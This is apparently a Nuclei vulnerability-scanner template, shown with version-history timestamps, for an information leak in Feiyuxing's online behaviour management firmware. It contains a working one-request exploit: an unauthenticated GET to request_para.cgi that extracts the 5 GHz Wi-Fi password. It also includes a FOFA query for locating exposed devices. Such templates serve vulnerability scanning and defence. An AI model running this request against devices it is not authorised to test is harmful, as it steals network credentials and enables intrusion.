2023-08-18 03:00:22 +00:00
id : feiyuxing-info-leak
info :
name : Feiyuxing Information - Exposure
author : SleepingBag945
severity : high
description : |
Feiyuxing enterprise-level intelligent online behavior management system has authority bypass and information leakage vulnerabilities, which can obtain administrator rights and user passwords
reference :
2023-08-18 04:52:37 +00:00
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E9%A3%9E%E9%B1%BC%E6%98%9F/%E9%A3%9E%E9%B1%BC%E6%98%9F%20%E4%BC%81%E4%B8%9A%E7%BA%A7%E6%99%BA%E8%83%BD%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
- https://github.com/hktalent/scan4all/blob/main/lib/goby/goby_pocs/Adslr_Enterprise_online_behavior_management_system_Information_leakage.json
2023-08-18 05:18:00 +00:00
- https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%A3%9E%E9%B1%BC%E6%98%9F%20%E4%BC%81%E4%B8%9A%E7%BA%A7%E6%99%BA%E8%83%BD%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
2024-09-10 09:08:16 +00:00
classification :
cpe : cpe:2.3:o:feiyuxing:vec40g_firmware:*:*:*:*:*:*:*:*
2023-08-18 03:00:22 +00:00
metadata :
verified : "true"
2023-08-18 04:52:37 +00:00
max-request : 1
2024-09-10 08:22:50 +00:00
vendor : feiyuxing
2024-09-10 09:08:16 +00:00
product : vec40g_firmware
fofa-query : title="飞鱼星企业级智能上网行为管理系统"
2023-08-18 04:52:37 +00:00
tags : misconfig,exposure,iot,wpa,wpa2
2023-08-18 03:00:22 +00:00
http :
- method : GET
path :
- "{{BaseURL}}/request_para.cgi?parameter=wifi_get_5g_host"
matchers :
- type : dsl
dsl :
2023-08-18 04:52:37 +00:00
- 'status_code == 200'
2023-08-18 05:18:00 +00:00
- 'contains(body,"WPA2-PSK") || contains(body,"WPA-PSK")'
2023-08-18 04:52:37 +00:00
condition : and
2023-08-18 05:18:00 +00:00
extractors :
- type : regex
part : body
group : 1
regex :
- "\"wl_passwd_5g\":\"(.*?)\""
2024-09-12 05:14:01 +00:00
# digest: 4a0a00473045022100f0850c0689a7220a0b5d158008bcf185ef8f0be25a4a1a29cf094d04800b036e022008e4c0f28b03064fd420cb97fa9a48cce5efd683416e9d00794b90afa24db50a:922c64590222798bb761d5b6d8e72950